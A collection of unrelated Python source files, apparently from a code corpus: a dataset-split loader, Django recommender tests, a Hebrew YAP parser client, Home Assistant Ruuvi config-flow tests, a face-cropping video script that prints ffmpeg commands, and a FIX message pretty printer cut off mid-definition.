cur_train_set, cur_val_set, cur_test_set = load_dataset_splits(bag_name, cfg)
train_sets.append(cur_train_set)
val_sets.append(cur_val_set)
test_sets.append(cur_test_set)
train_set = ConcatDataset(train_sets)
val_set = ConcatDataset(val_sets)
test_set = ConcatDataset(test_sets)
return train_set, val_set, test_set
def merge_into_single_split(bag_names, cfg):
"""Each parsed bag directory has train/val/test subfolders. This function can be used to combine
the data across all three splits (train/val/test) into a single torch dataset/split.
"""
train_set, val_set, test_set = concat_datasets(bag_names, cfg)
dataset = ConcatDataset([train_set, val_set, test_set])
return dataset
def get_split_datasets(dataset_name):
"""Returns a train set, val set, and test set.
"""
print('loading dataset...')
cfg = get_config()
if dataset_name == 'v0.2':
train_bag_names = [
'v0.2/nav_area_1',
'v0.2/nav_area_5b',
'v0.2/nav_area_6',
]
val_bag_names = [
'v0.2/nav_area_3',
]
test_bag_names = [
'v0.2/nav_area_4',
]
train_set = merge_into_single_split(train_bag_names, cfg)
val_set = merge_into_single_split(val_bag_names, cfg)
test_set = merge_into_single_split(test_bag_names, cfg)
else:
print('Selected dataset: %s' % dataset_name)
raise ValueError('Please use a valid dataset.')
print('full dataset size:', len(train_set) + len(val_set) + len(test_set))
print('train set size:', len(train_set))
print('val set size:', len(val_set))
print('test set size:', len(test_set))
print('')
return train_set, val_set, test_set
|
import pytest
from django.test import override_settings
from ozpcenter.recommend.recommend import RecommenderDirectory
from ozpcenter.scripts import sample_data_generator as data_gen
from ozpcenter.utils import shorthand_dict
from tests.ozp.cases import APITestCase
from tests.ozpcenter.helper import APITestHelper
@override_settings(ES_ENABLED=False)
class RecommenderTest(APITestCase):
@classmethod
def setUpTestData(cls):
data_gen.run()
def setUp(self):
self.maxDiff = None
def test_recommendation_baseline_graph(self):
recommender_wrapper_obj = RecommenderDirectory()
actual_result = recommender_wrapper_obj.recommend('baseline,graph_cf')
expected_result = {'Baseline': {}, 'Bookmark Collaborative Filtering': {}}
self.assertEquals(actual_result, expected_result)
url = '/api/storefront/recommended/?randomize=False'
response = APITestHelper.request(self, url, 'GET', username='wsmith', status_code=200)
title_scores = [{'title': listing['title'], '_score': listing['_score']} for listing in response.data['recommended']]
title_scores = sorted(title_scores, key=lambda k: (k['_score']['_sort_score'], k['title'])) # Order can change between postgres and sqlite
title_scores = shorthand_dict(title_scores)
expected_result = [
'(_score:(Baseline:(raw_score:8.0,weight:1.0),Bookmark Collaborative Filtering:(raw_score:1.0,weight:5.0),_sort_score:13.0),title:White Horse)',
'(_score:(Baseline:(raw_score:8.2,weight:1.0),Bookmark Collaborative Filtering:(raw_score:1.0,weight:5.0),_sort_score:13.2),title:Navigation)',
'(_score:(Baseline:(raw_score:8.5,weight:1.0),Bookmark Collaborative Filtering:(raw_score:1.0,weight:5.0),_sort_score:13.5),title:Bleach)',
'(_score:(Baseline:(raw_score:9.0,weight:1.0),Bookmark Collaborative Filtering:(raw_score:1.0,weight:5.0),_sort_score:14.0),title:Informational Book)',
'(_score:(Baseline:(raw_score:9.0,weight:1.0),Bookmark Collaborative Filtering:(raw_score:1.0,weight:5.0),_sort_score:14.0),title:JotSpot)',
'(_score:(Baseline:(raw_score:9.0,weight:1.0),Bookmark Collaborative Filtering:(raw_score:1.0,weight:5.0),_sort_score:14.0),title:LocationLister)',
'(_score:(Baseline:(raw_score:9.0,weight:1.0),Bookmark Collaborative Filtering:(raw_score:1.0,weight:5.0),_sort_score:14.0),title:Stop sign)',
'(_score:(Baseline:(raw_score:10.5,weight:1.0),Bookmark Collaborative Filtering:(raw_score:1.0,weight:5.0),_sort_score:15.5),title:Killer Whale)',
'(_score:(Baseline:(raw_score:11.5,weight:1.0),Bookmark Collaborative Filtering:(raw_score:1.0,weight:5.0),_sort_score:16.5),title:Wolf Finder)',
'(_score:(Baseline:(raw_score:11.5,weight:1.0),Bookmark Collaborative Filtering:(raw_score:2.0,weight:5.0),_sort_score:21.5),title:Chart Course)'
]
# import pprint
# print(pprint.pprint(title_scores))
self.assertEquals(expected_result, title_scores)
sorted_scores = [listing['_score']['_sort_score'] for listing in response.data['recommended']]
self.assertEquals(sorted(sorted_scores, reverse=True), sorted_scores)
def test_recommendation_baseline(self):
recommender_wrapper_obj = RecommenderDirectory()
actual_result = recommender_wrapper_obj.recommend('baseline')
expected_result = {'Baseline': {}}
self.assertEquals(actual_result, expected_result)
url = '/api/storefront/recommended/?randomize=False'
response = APITestHelper.request(self, url, 'GET', username='wsmith', status_code=200)
title_scores = [{'title': listing['title'], '_score': listing['_score']} for listing in response.data['recommended']]
title_scores = sorted(title_scores, key=lambda k: (k['_score']['_sort_score'], k['title'])) # Order can change between postgres and sqlite
title_scores = shorthand_dict(title_scores)
expected_result = [
'(_score:(Baseline:(raw_score:9.0,weight:1.0),_sort_score:9.0),title:Bass Fishing)',
'(_score:(Baseline:(raw_score:9.0,weight:1.0),_sort_score:9.0),title:Dragons)',
'(_score:(Baseline:(raw_score:9.0,weight:1.0),_sort_score:9.0),title:House Targaryen)',
'(_score:(Baseline:(raw_score:9.0,weight:1.0),_sort_score:9.0),title:Informational Book)',
'(_score:(Baseline:(raw_score:9.0,weight:1.0),_sort_score:9.0),title:JotSpot)',
'(_score:(Baseline:(raw_score:9.0,weight:1.0),_sort_score:9.0),title:LocationLister)',
'(_score:(Baseline:(raw_score:9.0,weight:1.0),_sort_score:9.0),title:Stop sign)',
'(_score:(Baseline:(raw_score:10.5,weight:1.0),_sort_score:10.5),title:Killer Whale)',
'(_score:(Baseline:(raw_score:11.5,weight:1.0),_sort_score:11.5),title:Chart Course)',
'(_score:(Baseline:(raw_score:11.5,weight:1.0),_sort_score:11.5),title:Wolf Finder)'
]
# import pprint
# print(pprint.pprint(title_scores))
self.assertEquals(expected_result, title_scores)
sorted_scores = [listing['_score']['_sort_score'] for listing in response.data['recommended']]
self.assertEquals(sorted(sorted_scores, reverse=True), sorted_scores)
@pytest.mark.skip('TODO: failing for undetermined reason')
def test_recommendation_graph(self):
recommender_wrapper_obj = RecommenderDirectory()
actual_result = recommender_wrapper_obj.recommend('graph_cf')
expected_result = {'Bookmark Collaborative Filtering': {}}
self.assertEquals(actual_result, expected_result)
url = '/api/storefront/recommended/?randomize=False'
response = APITestHelper.request(self, url, 'GET', username='wsmith', status_code=200)
title_scores = [{'title': listing['title'], '_score': listing['_score']} for listing in response.data['recommended']]
title_scores = sorted(title_scores, key=lambda k: (k['_score']['_sort_score'], k['title'])) # Order can change between postgres and sqlite
title_scores = shorthand_dict(title_scores)
expected_result = [
'(_score:(Bookmark Collaborative Filtering:(raw_score:1.0,weight:5.0),_sort_score:5.0),title:Acoustic Guitar)',
'(_score:(Bookmark Collaborative Filtering:(raw_score:1.0,weight:5.0),_sort_score:5.0),title:Bleach)',
'(_score:(Bookmark Collaborative Filtering:(raw_score:1.0,weight:5.0),_sort_score:5.0),title:Bourbon)',
'(_score:(Bookmark Collaborative Filtering:(raw_score:1.0,weight:5.0),_sort_score:5.0),title:India Pale Ale)',
'(_score:(Bookmark Collaborative Filtering:(raw_score:1.0,weight:5.0),_sort_score:5.0),title:Informational Book)',
'(_score:(Bookmark Collaborative Filtering:(raw_score:1.0,weight:5.0),_sort_score:5.0),title:Internet meme)',
'(_score:(Bookmark Collaborative Filtering:(raw_score:1.0,weight:5.0),_sort_score:5.0),title:Killer Whale)',
'(_score:(Bookmark Collaborative Filtering:(raw_score:1.0,weight:5.0),_sort_score:5.0),title:Screamin Eagle CVO)',
'(_score:(Bookmark Collaborative Filtering:(raw_score:1.0,weight:5.0),_sort_score:5.0),title:Snow)',
'(_score:(Bookmark Collaborative Filtering:(raw_score:2.0,weight:5.0),_sort_score:10.0),title:Chart Course)'
]
# import pprint
# print(pprint.pprint(title_scores))
self.assertEquals(expected_result, title_scores)
sorted_scores = [listing['_score']['_sort_score'] for listing in response.data['recommended']]
self.assertEquals(sorted(sorted_scores, reverse=True), sorted_scores)
|
# Author: <NAME>
# Python Version: 3.6
## Copyright 2019 <NAME>
##
## This program is free software: you can redistribute it and/or modify
## it under the terms of the GNU General Public License as published by
## the Free Software Foundation, either version 3 of the License, or
## (at your option) any later version.
##
## This program is distributed in the hope that it will be useful,
## but WITHOUT ANY WARRANTY; without even the implied warranty of
## MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
## GNU General Public License for more details.
##
## You should have received a copy of the GNU General Public License
## along with this program. If not, see <http://www.gnu.org/licenses/>.
import pandas as pd
import numpy as np
import requests
import sys
import traceback
import csv
import re, string
from enums import *
from hebtokenizer import HebTokenizer
class YapApi(object):
"""
Interface to Open University YAP (Yet another parser) https://github.com/OnlpLab/yap.
This class is calling GO baesd server, and:
1. Wrap YAP in Python.
2. Add tokenizer. Credit: Prof' <NAME>.
3. Turn output CONLLU format to Dataframe & JSON.
"""
def __init__(self):
pass
def run(self, text:str, ip:str):
"""
text: the text to be parsed.
ip: YAP server IP, with port (default is 8000), if localy installed then 127.0.0.1:8000
"""
try:
print('Start Yap call')
# Keep alpha-numeric and punctuations only.
alnum_text=self.clean_text(text)
# Tokenize...
tokenized_text = HebTokenizer().tokenize(alnum_text)
tokenized_text = ' '.join([word for (part, word) in tokenized_text])
print("Tokens: {}".format(len(tokenized_text.split())))
self.init_data_items()
# Split to sentences for best performance.
text_arr=self.split_text_to_sentences(tokenized_text)
for i, sntnce_or_prgrph in enumerate( text_arr):
# Actual call to YAP server
rspns=self.call_yap(sntnce_or_prgrph, ip)
print('End Yap call {} /{}'.format( i ,len(text_arr)-1))
# Expose this code to print the results iin Conllu format
#conllu_dict=self.print_in_conllu_format(rspns)
# Turn CONLLU format to dataframe
_dep_tree, _md_lattice, _ma_lattice=self.conllu_format_to_dataframe(rspns)
_segmented_text= ' '.join( _dep_tree[yap_cols.word.name])
_lemmas=' '.join(_dep_tree[yap_cols.lemma.name])
self.append_prgrph_rslts(_dep_tree, _md_lattice, _ma_lattice, _segmented_text, _lemmas)
return tokenized_text, self.segmented_text, self.lemmas, self.dep_tree, self.md_lattice, self.ma_lattice
except Exception as err:
print( sys.exc_info()[0])
print( traceback.format_exc())
print( str(err))
print("Unexpected end of program")
def split_text_to_sentences(self, tokenized_text):
"""
YAP better perform on sentence-by-sentence.
Also, dep_tree is limited to 256 nodes.
"""
max_len=150
arr=tokenized_text.strip().split()
sentences=[]
# Finding next sentence break.
while (True):
stop_points=[h for h in [i for i, e in enumerate(arr) if re.match(r"[!|.|?]",e)] ]
if len(stop_points)>0:
stop_point=min(stop_points)
# Keep several sentence breaker as 1 word, like "...." or "???!!!"
while True:
stop_points.remove(stop_point)
if len(stop_points)>1 and min(stop_points)==(stop_point+1):
stop_point=stop_point+1
else:
break
# Case there is no sentence break, and this split > MAX LEN:
sntnc=arr[:stop_point+1]
if len(sntnc) >max_len:
while(len(sntnc) >max_len):
sentences.append(" ".join(sntnc[:140]))
sntnc=sntnc[140:]
sentences.append(" ".join(sntnc))
# Normal: sentence is less then 150 words...
else:
sentences.append(" ".join(arr[:stop_point+1] ))
arr=arr[stop_point+1:]
else:
break
if len(arr)>0:
sentences.append(" ".join(arr))
return sentences
def clean_text(self, text:str):
text=text.replace('\n', ' ').replace('\r', ' ')
pattern= re.compile(r'[^א-ת\s.,!?a-zA-Z]')
alnum_text =pattern.sub(' ', text)
while(alnum_text.find(' ')>-1):
alnum_text=alnum_text.replace(' ', ' ')
return alnum_text
def init_data_items(self):
self.segmented_text=""
self.lemmas=""
self.dep_tree=pd.DataFrame()
self.md_lattice=pd.DataFrame()
self.ma_lattice=pd.DataFrame()
def append_prgrph_rslts(self, _dep_tree:pd.DataFrame, _md_lattice:pd.DataFrame, _ma_lattice:pd.DataFrame,
_segmented_text:str, _lemmas:str):
self.segmented_text="{} {}".format(self.segmented_text, _segmented_text).strip()
self.lemmas="{} {}".format(self.lemmas, _lemmas).strip()
self.dep_tree=pd.concat([self.dep_tree, _dep_tree])
self.md_lattice=pd.concat([self.md_lattice, _md_lattice])
self.ma_lattice=pd.concat([self.ma_lattice, _ma_lattice])
def split_long_text(self, tokenized_text:str):
# Max num of words YAP can handle at one call.
max_len=150
arr=tokenized_text.split()
rslt=[]
while len(arr)> max_len:
# Finding next sentence break.
try:
stop_point=min([h for h in [i for i, e in enumerate(arr) if re.match(r"[!|.|?]",e)] if h> max_len])
except Exception as err:
if str(err) =="min() arg is an empty sequence":
stop_point=150
if len(arr)<stop_point:
stop_point=len(arr)-1
rslt.append(" ".join(arr[: (stop_point+1)]))
arr=arr[(stop_point+1):]
rslt.append(" ".join(arr))
return rslt
def call_yap(self, text:str, ip:str):
"""
Actual call to YAP HTTP Server
"""
url = "{}{}{}".format( "http://", ip, "/yap/heb/joint")
_json='{"text":" '+text+' "}'
headers = {'content-type': 'application/json'}
r = requests.post(url,
data=_json.encode('utf-8'),
headers={'Content-type': 'application/json; charset=utf-8'})
self.check_response_status(r)
return r.json()
def check_response_status(self, response: requests.Response):
if response.status_code != 200:
print('url: %s' %(response.url))
if response.json() != None:
print("response : {}".format( response.json()))
if response.text != None:
print('Reason: Text: %s'%( response.text))
def conllu_format_to_dataframe(self, rspns:dict):
for k,v in rspns.items():
if k==yap_ent.dep_tree.name:
dep_tree=self.parse_dep_tree(v)
elif k==yap_ent.md_lattice.name:
md_lattice=self.parse_md_lattice(v)
elif k==yap_ent.ma_lattice.name:
ma_lattice=self.parse_ma_lattice(v)
return dep_tree.fillna(-1), md_lattice.fillna(-1), ma_lattice.fillna(-1)
def parse_dep_tree(self, v:str):
data=[sub.split("\t") for item in str(v).split("\n\n") for sub in item.split("\n")]
labels=[yap_cols.num.name, yap_cols.word.name, yap_cols.lemma.name, yap_cols.pos.name, yap_cols.pos_2.name,
yap_cols.empty.name, yap_cols.dependency_arc.name, yap_cols.dependency_part.name,
yap_cols.dependency_arc_2.name, yap_cols.dependency_part_2.name]
# remove first line w=hich is empty
data=[l for l in data if len(l)!=1 ]
# remove stop char
new_data = []
for row in data:
n_row = [word.replace("\r","") for word in row]
new_data.append(n_row)
df=pd.DataFrame.from_records(new_data, columns=labels)
# Case YAP find punctuation chars like ',', '.', YAP set no lemma for them.
# That case set the word to be its own lemma
df.loc[df[yap_cols.lemma.name] == '', [yap_cols.lemma.name]] =df[yap_cols.word.name]
return df
def parse_md_lattice(self, v:str):
data=[sub.split("\t") for item in str(v).split("\n\n") for sub in item.split("\n")]
labels=[yap_cols.num.name, yap_cols.num_2.name,yap_cols.word.name, yap_cols.lemma.name,
yap_cols.pos.name, yap_cols.pos_2.name,
# parts:
yap_cols.gen.name,
yap_cols.num_last.name,
yap_cols.num_s_p.name, yap_cols.per.name, yap_cols.tense.name ]
list_of_dict=[]
for row in data:
if len(row)==1:
continue
if len(row)!=8:
raise Exception("Len of row is: {} row: {}".format(len(row), row))
_dict={
yap_cols.num.name:None,
yap_cols.num_2.name:None,
yap_cols.word.name:None,
yap_cols.empty.name:None,
yap_cols.pos.name:None,
yap_cols.pos_2.name:None,
yap_cols.gen.name:None,
yap_cols.num_s_p.name:None,
yap_cols.per.name:None,
yap_cols.tense.name:None,
yap_cols.num_last.name:None
}
for i,tag in enumerate( row):
if i<6 or i==7:
_dict[labels[i]]=tag
else:
for part in tag.split("|"):
if part.split("=")[0]==yap_cols.gen.name:
_dict[yap_cols.gen.name]=part.split("=")[1]
elif part.split("=")[0]==yap_cols.per.name:
_dict[yap_cols.per.name]=part.split("=")[1]
elif part.split("=")[0]==yap_cols.tense.name:
_dict[yap_cols.tense.name]=part.split("=")[1]
elif part.split("=")[0]==yap_cols.num.name:
_dict[yap_cols.num_s_p.name]=part.split("=")[1]
list_of_dict.append(_dict)
df=pd.DataFrame(list_of_dict)
return df
def parse_ma_lattice(self, v:str):
data=[sub.split("\t") for item in str(v).split("\n\n") for sub in item.split("\n")]
labels=[yap_cols.num.name,
yap_cols.num_2.name,
yap_cols.word.name,
yap_cols.lemma.name,
yap_cols.empty.name,
yap_cols.pos.name,
yap_cols.pos_2.name,
# parts:
yap_cols.gen.name,
# Should remain on #7 position.
yap_cols.num_last.name,
yap_cols.num_s_p.name, yap_cols.per.name,
yap_cols.tense.name,
yap_cols.suf_gen.name,
yap_cols.suf_num.name,
yap_cols.suf_per.name
]
list_of_dict=[]
for row in data:
if len(row)==1:
continue
if len(row)!=8:
raise Exception("Len of row is: {} row: {}".format(len(row), row))
_dict={
yap_cols.num.name:None,
yap_cols.num_2.name:None,
yap_cols.word.name:None,
yap_cols.lemma.name:None,
yap_cols.empty.name:None,
yap_cols.pos.name:None,
yap_cols.pos_2.name:None,
yap_cols.gen.name:None,
yap_cols.num_s_p.name:None,
yap_cols.per.name:None,
yap_cols.tense.name:None,
yap_cols.num_last.name:None,
yap_cols.suf_gen.name:None,
yap_cols.suf_num.name:None,
yap_cols.suf_per.name:None
}
for i,tag in enumerate( row):
if i<6 or i==7:
_dict[labels[i]]=tag
else:
for part in tag.split("|"):
if part.split("=")[0]==yap_cols.gen.name:
_dict[yap_cols.gen.name]=part.split("=")[1]
elif part.split("=")[0]==yap_cols.per.name:
_dict[yap_cols.per.name]=part.split("=")[1]
elif part.split("=")[0]==yap_cols.tense.name:
_dict[yap_cols.tense.name]=part.split("=")[1]
elif part.split("=")[0]==yap_cols.num.name:
_dict[yap_cols.num_s_p.name]=part.split("=")[1]
elif part.split("=")[0]==yap_cols.suf_gen.name:
_dict[yap_cols.suf_gen.name]=part.split("=")[1]
elif part.split("=")[0]==yap_cols.suf_num.name:
_dict[yap_cols.suf_num.name]=part.split("=")[1]
elif part.split("=")[0]==yap_cols.suf_per.name:
_dict[yap_cols.suf_per.name]=part.split("=")[1]
list_of_dict.append(_dict)
df=pd.DataFrame(list_of_dict)
return df
def print_in_conllu_format(self, rspns:dict):
new_dict={}
for k,v in rspns.items():
new_dict[k]=[]
print("")
print(k)
for item in str( v).split("\n\n"):
for sub_item in item.split("\n"):
if sub_item!="":
print(sub_item)
new_dict[k].append(sub_item)
if __name__ == '__main__':
# The text to be processed.
text = "עכשיו אני מרגיש כאילו לא יודע כלום עכשיו אני מחיש את צעדיי היא מסתכלת בחלון רואה אותי עובר בחוץ היא לא יודעת מה עובר עליי. \
בתוך עיניה הכחולות ירח חם תלוי, עכשיו היא עצובה כמוני בוודאי היא מוציאה את בגדיי אוכלת לבדה ת'תות \
היא לא יודעת, מה עובר עליי. \
אמנם אין אהבה שאין לה סוף אבל הסוף הזה נראה לי מקולל הולך בין האנשים ברחוב צועק או או או או או או \
תגידו לה."
# IP of YAP server, if locally installed then '127.0.0.1'
ip='127.0.0.1:8000'
yap=YapApi()
tokenized_text, segmented_text, lemmas, dep_tree, md_lattice, ma_lattice=yap.run(text, ip)
print(tokenized_text)
print(segmented_text)
print(lemmas)
print(dep_tree.to_string())
print(md_lattice)
print(ma_lattice)
print('Program end')
|
<reponame>sergioisidoro/hass-ruuvi
"""Tests for the config flow."""
from unittest import mock
from homeassistant.const import CONF_MAC, CONF_NAME, CONF_PATH
from pytest_homeassistant_custom_component.common import AsyncMock, patch, MockConfigEntry
from custom_components.ruuvi import config_flow
from custom_components.ruuvi.const import DOMAIN
async def test_flow_user_init(hass):
"""Test the initialization of the form in the first step of the config flow."""
result = await hass.config_entries.flow.async_init(
config_flow.DOMAIN, context={"source": "user"}
)
# Note, the user step is now empty, which will later be used to
# choose betweek Gateway and Ruuvi Sensors. Right now we get
# forwarded right away to the Add Sensor
expected = {
"data_schema": config_flow.CONFIG_FLOW_RUUVI_ADD_SCHEMA,
"description_placeholders": None,
"errors": {},
"flow_id": mock.ANY,
"handler": "ruuvi",
"step_id": "add_sensor",
"type": "form",
}
assert expected == result
async def test_flow_add_sensor_data_valid(hass):
"""Test we advance to the next step when valid sensor is submitted."""
_result = await hass.config_entries.flow.async_init(
config_flow.DOMAIN, context={"source": "add_sensor"}
)
result = await hass.config_entries.flow.async_configure(
_result["flow_id"], user_input={CONF_MAC: "MA:CA:DD:RE:SS:00", CONF_NAME: "Sauna"}
)
assert "config_sensor" == result["step_id"]
assert "form" == result["type"]
@patch('custom_components.ruuvi.sensor.RuuviTagClient')
async def test_flow_configure_sensor_data_valid(_ruuvi_tag_client, hass):
"""Test we advance to the next step when valid sensor is submitted."""
result = await hass.config_entries.flow.async_init(
config_flow.DOMAIN, context={"source": "user"}
)
result = await hass.config_entries.flow.async_configure(
result["flow_id"], user_input={CONF_MAC: "MA:CA:DD:RE:SS:00", CONF_NAME: "Sauna"}
)
result = await hass.config_entries.flow.async_configure(
result["flow_id"], user_input={
"temperature": True,
"humidity": True,
"pressure": True,
"acceleration": True,
"acceleration_x": True,
"acceleration_y": True,
"acceleration_z": True,
"battery": True,
"movement_counter": True
}
)
assert "add_another" == result["step_id"]
assert "form" == result["type"]
async def test_flow_add_another_data_valid(hass):
"""Test we advance to the next step when valid sensor is submitted."""
_result = await hass.config_entries.flow.async_init(
config_flow.DOMAIN, context={"source": "add_another"}
)
result = await hass.config_entries.flow.async_configure(
_result["flow_id"], user_input={"add_another": True}
)
assert "add_sensor" == result["step_id"]
assert "form" == result["type"]
@patch('custom_components.ruuvi.sensor.RuuviTagClient')
async def test_flow_complete(_ruuvi_tag_client, hass):
"""Test we advance to the next step when valid sensor is submitted."""
_result = await hass.config_entries.flow.async_init(
config_flow.DOMAIN, context={"source": "add_another"}
)
result = await hass.config_entries.flow.async_configure(
_result["flow_id"], user_input={"add_another": False}
)
assert "create_entry" == result["type"] |
import face_alignment
import skimage.io
import numpy
from argparse import ArgumentParser
from skimage import img_as_ubyte
from skimage.transform import resize
from tqdm import tqdm
import os
import imageio
import numpy as np
import warnings
warnings.filterwarnings("ignore")
def extract_bbox(frame, fa):
if max(frame.shape[0], frame.shape[1]) > 640:
scale_factor = max(frame.shape[0], frame.shape[1]) / 640.0
frame = resize(frame, (int(frame.shape[0] / scale_factor), int(frame.shape[1] / scale_factor)))
frame = img_as_ubyte(frame)
else:
scale_factor = 1
frame = frame[..., :3]
# bboxes = fa.face_detector.detect_from_image(frame[..., ::-1])
bboxes = fa.face_detector.detect_from_image(frame)
if len(bboxes) == 0:
return []
return np.array(bboxes)[:, :-1] * scale_factor
def bb_intersection_over_union(boxA, boxB):
xA = max(boxA[0], boxB[0])
yA = max(boxA[1], boxB[1])
xB = min(boxA[2], boxB[2])
yB = min(boxA[3], boxB[3])
interArea = max(0, xB - xA + 1) * max(0, yB - yA + 1)
boxAArea = (boxA[2] - boxA[0] + 1) * (boxA[3] - boxA[1] + 1)
boxBArea = (boxB[2] - boxB[0] + 1) * (boxB[3] - boxB[1] + 1)
iou = interArea / float(boxAArea + boxBArea - interArea)
return iou
def join(tube_bbox, bbox):
xA = min(tube_bbox[0], bbox[0])
yA = min(tube_bbox[1], bbox[1])
xB = max(tube_bbox[2], bbox[2])
yB = max(tube_bbox[3], bbox[3])
return (xA, yA, xB, yB)
def compute_bbox(start, end, fps, tube_bbox, frame_shape, inp, image_shape, increase_area=0.1):
left, top, right, bot = tube_bbox
width = right - left
height = bot - top
#Computing aspect preserving bbox
width_increase = max(increase_area, ((1 + 2 * increase_area) * height - width) / (2 * width))
height_increase = max(increase_area, ((1 + 2 * increase_area) * width - height) / (2 * height))
left = int(left - width_increase * width)
top = int(top - height_increase * height)
right = int(right + width_increase * width)
bot = int(bot + height_increase * height)
top, bot, left, right = max(0, top), min(bot, frame_shape[0]), max(0, left), min(right, frame_shape[1])
h, w = bot - top, right - left
start = start / fps
end = end / fps
time = end - start
scale = f'{image_shape[0]}:{image_shape[1]}'
return f'ffmpeg -i {inp} -ss {start} -t {time} -filter:v "crop={w}:{h}:{left}:{top}, scale={scale}" crop.mp4'
def compute_bbox_trajectories(trajectories, fps, frame_shape, args):
commands = []
for i, (bbox, tube_bbox, start, end) in enumerate(trajectories):
if (end - start) >= args.min_frames:
command = compute_bbox(start, end, fps, tube_bbox, frame_shape, inp=args.inp, image_shape=args.image_shape, increase_area=args.increase)
commands.append(command)
return commands
def process_video(args):
device = 'cpu' if args.cpu else 'cuda'
fa = face_alignment.FaceAlignment(face_alignment.LandmarksType._2D, flip_input=False, device=device)
video = imageio.get_reader(args.inp)
trajectories = []
previous_frame = None
if args.input_type=='video':
fps = video.get_meta_data()['fps']
else:
fps=1
commands = []
try:
for i, frame in tqdm(enumerate(video)):
frame_shape = frame.shape
bboxes = extract_bbox(frame, fa)
## For each trajectory check the criterion
not_valid_trajectories = []
valid_trajectories = []
for trajectory in trajectories:
tube_bbox = trajectory[0]
intersection = 0
for bbox in bboxes:
intersection = max(intersection, bb_intersection_over_union(tube_bbox, bbox))
if intersection > args.iou_with_initial:
valid_trajectories.append(trajectory)
else:
not_valid_trajectories.append(trajectory)
commands += compute_bbox_trajectories(not_valid_trajectories, fps, frame_shape, args)
trajectories = valid_trajectories
## Assign bbox to trajectories, create new trajectories
for bbox in bboxes:
intersection = 0
current_trajectory = None
for trajectory in trajectories:
tube_bbox = trajectory[0]
current_intersection = bb_intersection_over_union(tube_bbox, bbox)
if intersection < current_intersection and current_intersection > args.iou_with_initial:
intersection = bb_intersection_over_union(tube_bbox, bbox)
current_trajectory = trajectory
## Create new trajectory
if current_trajectory is None:
trajectories.append([bbox, bbox, i, i])
else:
current_trajectory[3] = i
current_trajectory[1] = join(current_trajectory[1], bbox)
except IndexError as e:
raise (e)
commands += compute_bbox_trajectories(trajectories, fps, frame_shape, args)
return commands
if __name__ == "__main__":
parser = ArgumentParser()
parser.add_argument("--image_shape", default=(256, 256), type=lambda x: tuple(map(int, x.split(','))),
help="Image shape")
parser.add_argument("--increase", default=0.1, type=float, help='Increase bbox by this amount')
parser.add_argument("--iou_with_initial", type=float, default=0.25, help="The minimal allowed iou with inital bbox")
parser.add_argument("--inp", required=True, help='Input image or video')
parser.add_argument("--min_frames", type=int, default=0, help='Minimum number of frames')
parser.add_argument("--cpu", dest="cpu", action="store_true", help="cpu mode.")
parser.add_argument("--input_type", required=True, help='image or video')
args = parser.parse_args()
commands = process_video(args)
for command in commands:
print (command)
|
<filename>tagvalueprettyprinter/PrettyPrinter.py<gh_stars>1-10
class PrettyPrinter():
def __init__(self):
'''Initialize fix with fcgm properties'''
from pyfixorchestra import FixDictionary
field = FixDictionary('fields')
self.fields = (field.generateDictionary()) # [names, temp]
component = FixDictionary('components')
self.components = (component.generateDictionary()) # [names, miniIDs, miniGroup, miniComp, temp]
group = FixDictionary('groups')
self.groups = (group.generateDictionary()) # [names, numInGroup, miniIDs, miniGroup, miniComp, temp]
message = FixDictionary('messages')
self.messages = (message.generateDictionary()) # [names, miniIDs, miniGroup, miniComp, temp]
self.level = 1
self.context_list = [] # List of IDs that define context.
self.context = [] # List of 2 items - tag, type(ie mcgf)
self.allowed = [] # List of lists of allowed field,group,comp,numingrp
self.output_string = [] # tag value level
def get_allowed(self):
'''Takes current context value and type, and returns allowed fields, groups and components'''
context = self.context[0]
feature = self.context[1]
if feature == 'm':
allowed_fields = self.messages[context][1]
allowed_groups = self.messages[context][2]
allowed_comps = self.messages[context][3]
allowed_numingroup = []
elif feature == 'c':
allowed_fields = self.components[context][1]
allowed_groups = self.components[context][2]
allowed_comps = self.components[context][3]
allowed_numingroup = []
else:
allowed_numingroup = self.groups[context][1]
allowed_fields = self.groups[context][2]
allowed_groups = self.groups[context][3]
allowed_comps = self.groups[context][4]
return ([allowed_fields, allowed_groups,allowed_comps, allowed_numingroup])
def check_in_subfields(self, tv):
'''Checks if the tag is in currently allowed fields'''
return (tv[0] in self.allowed[0], '0')
def check_in_subcomponents(self, tv):
'''Checks if the tag is inside currently allowed components'''
for c in self.allowed[2]:
if tv[0] in self.components[c][1]: # If tag is in component's fields
return (True, c) # Return true and the component that contains this tag
return (False, '0')
def check_in_subgroups(self, tv):
'''Checks if the tag is a numingroup inside currently allowed groups'''
for g in self.allowed[1]:
if tv[0] in self.groups[g][1]: # If tag is in groups's numingroup
return (True, g) # Return true and the group that contains this tag
return (False, '0')
def check_in_subs(self, tv):
'''checks for tv in fields, subcomponents, subgroups. Appends output_str and returns True if found'''
in_sub_field = self.check_in_subfields(tv)
in_sub_comp = self.check_in_subcomponents(tv)
in_sub_group = self.check_in_subgroups(tv)
# Check in sub fields
if in_sub_field[0]:
self.out(tv, self.level,'field')
return True
# Check in sub components
elif in_sub_comp[0]:
self.level += 1
self.context = [in_sub_comp[1], 'c']
self.context_list.append(self.context)
self.allowed = self.get_allowed()
self.out(tv, self.level,'component',self.components[self.context[0]][0])
return True
# Check in sub group
elif in_sub_group[0]:
self.level += 1
self.context = [in_sub_group[1], 'g']
self.context_list.append(self.context)
self.allowed = self.get_allowed()
self.out(tv, self.level-1,'numingrp',self.groups[self.context[0]][0])
return True
else:
return False
def out(self, tv, level, typee, name = None):
'''Appends tag, value, level, type and name to tag value list'''
tv.append(level)
tv.append(typee)
if name:
tv.append(name)
self.output_string.append(tv)
def get_level(self, msg):
'''Takes in 1 line of FIX message as list of lists, returns list of lists with levels appended'''
flag35 = False
for tv in msg:
# For StandardHeader - level = 1. Level is appended to tag value list, index 2
if not flag35:
self.out(tv, self.level, 'component')
# msgtype - sets context based on msgname, gets allowed fgc
if tv[0] == '35':
flag35 = True
self.context = [tv[1], 'm'] # type - message
self.context_list.append(self.context)
self.allowed = self.get_allowed()
if flag35 and tv[0] != '35':
bol = self.check_in_subs(tv)
# Go back one context if tag not found in current context
# Setting a count to avoid infinite loops
ct = 1
while not bol and ct < 30:
ct += 1
self.level -= 1
if self.level < 1:
print(f'Out of bounds! Check tag {tv[0]}')
break
self.context_list.pop()
self.context = self.context_list[-1]
self.allowed = self.get_allowed()
bol = self.check_in_subs(tv)
return(self.output_string)
def prettify(self,logfile):
'''COnsolidated function. Takes logfine as input, pretty prints messages'''
outp = self.parse(logfile)
self.prettyprint(outp)
def parse(self, logfile):
